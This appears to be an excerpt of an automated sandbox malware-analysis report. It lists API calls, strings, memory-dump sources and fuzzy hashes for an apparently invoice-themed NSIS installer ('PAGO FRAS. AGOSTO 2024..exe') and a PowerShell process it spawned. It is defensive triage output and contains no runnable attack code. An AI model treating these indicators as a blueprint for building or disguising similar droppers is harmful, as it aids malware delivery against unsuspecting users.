RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
Opcode Fuzzy Hash: df9cc67d31b04cd6e9f5647a99bb7b911e6a77bbf16d980a5e8a288dfb7b3bdc
Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F

Function 00404709 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
wsprintfA.USER32 ref: 004047AF
SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

%u.%u%s%s, xrefs: 00404791

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8

Function 00403974 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Blaggard Setup), ref: 00403A0C

Strings

Blaggard Setup, xrefs: 004039FB
1033, xrefs: 00403978, 00403982, 004039F3
"C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe", xrefs: 00403975

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"$1033$Blaggard Setup
API String ID: 530164218-2556252283
Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9

Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
lstrcatA.KERNEL32(?,00409014), ref: 004057C1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
GetTickCount.KERNEL32 ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D

Function 0040588F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Blaggard Setup,NSIS Error), ref: 00405D3C

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3081826266
Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E

Function 0040361A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
GlobalFree.KERNEL32(00000000), ref: 0040363B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC

Function 004057E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004057EE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe,80000000,00000003), ref: 004057FC

Strings

C:\Users\user\Desktop, xrefs: 004057E8

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD

Function 00405907 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

Memory Dump Source

Source File: 00000000.00000002.1695394960.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695381081.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695410954.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695425466.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695529825.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PAGO FRAS.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

Analysis Process: powershell.exePID: 7432, Parent PID: 7408COMMON

Executed Functions

Function 07A33060 Relevance: 31.3, Strings: 24, Instructions: 1313COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A3399F
4'^q, xrefs: 07A33903
4'^q, xrefs: 07A338F7
4'^q, xrefs: 07A33FCD
4'^q, xrefs: 07A339AB
4'^q, xrefs: 07A33506
4'^q, xrefs: 07A33A47
4'^q, xrefs: 07A33D53
4'^q, xrefs: 07A33FC1
4'^q, xrefs: 07A3366C
4'^q, xrefs: 07A334FA
4'^q, xrefs: 07A335C4
4'^q, xrefs: 07A3384F
4'^q, xrefs: 07A33A53
tP^q, xrefs: 07A33350
4'^q, xrefs: 07A331C5
tP^q, xrefs: 07A33344
4'^q, xrefs: 07A33D5F
4'^q, xrefs: 07A33708
4'^q, xrefs: 07A33714
4'^q, xrefs: 07A335B8
4'^q, xrefs: 07A33660
4'^q, xrefs: 07A3385B
4'^q, xrefs: 07A331B9

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-306622666
Opcode ID: 259db7fad69ee2bcc555e458a3b75f99118cf496245e090cb38e8e21a9a18027
Instruction ID: 19318a230e5ec411fca442ee46c827d92a5dcbac283c241d96712acc377887e9
Opcode Fuzzy Hash: 259db7fad69ee2bcc555e458a3b75f99118cf496245e090cb38e8e21a9a18027
Instruction Fuzzy Hash: A2B2BEB0B04309DFDB14CFA8C885BAABBF2AB89304F108469E9159F755CB76DC45CB91

Function 094506F0 Relevance: 19.4, Strings: 15, Instructions: 700COMMON

Download Yara Rule

Strings

$^q, xrefs: 09450796
4'^q, xrefs: 09450831
$^q, xrefs: 09450B4F
4'^q, xrefs: 09450A1E
4'^q, xrefs: 09450825
$^q, xrefs: 09450B3C
$^q, xrefs: 09450B5B
$^q, xrefs: 09450AF8
$^q, xrefs: 09450B30
$^q, xrefs: 094507B7
$^q, xrefs: 09450B14
tP^q, xrefs: 09450B94
tP^q, xrefs: 09450BA0
$^q, xrefs: 094507C7
4'^q, xrefs: 09450A12

Memory Dump Source

Source File: 00000001.00000002.1875215771.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9450000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1262107880
Opcode ID: 38e392125014be5ea4664604b730167a6db6f4ed844956574560b77a615b7784
Instruction ID: 646b08463560926763ce3352bccdbfe19efad41a6c04ec7b3ddcb542a36339b9
Opcode Fuzzy Hash: 38e392125014be5ea4664604b730167a6db6f4ed844956574560b77a615b7784
Instruction Fuzzy Hash: 4132CB75B04208DFC714CFA8C455AAABBE2AF85314F14846BEC0A9F756DB32DC45CBA1

Function 07A30840 Relevance: 6.5, Strings: 5, Instructions: 230COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A308AF
4'^q, xrefs: 07A308D4
$^q, xrefs: 07A308BB
4'^q, xrefs: 07A308E0
$^q, xrefs: 07A30893

Memory Dump Source

Source File: 00000001.00000002.1871719670.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: d5b19044797b0f3d2ef4d8f958d0113c333834294f04026bf1d209e88181f21f
Instruction ID: 975ebc10e5b8802fba16af83ba3205bc518f25092bcec08e27bf1840df669808
Opcode Fuzzy Hash: d5b19044797b0f3d2ef4d8f958d0113c333834294f04026bf1d209e88181f21f
Instruction Fuzzy Hash: 997137B1F002098FCB149F7998002ABBBE7EFC5611F14847AE869DB255DB31D945C7E1

Function 07A34D70 Relevance: 5.7, Strings: 4, Instructions: 708COMMON

Download Yara Rule

Strings

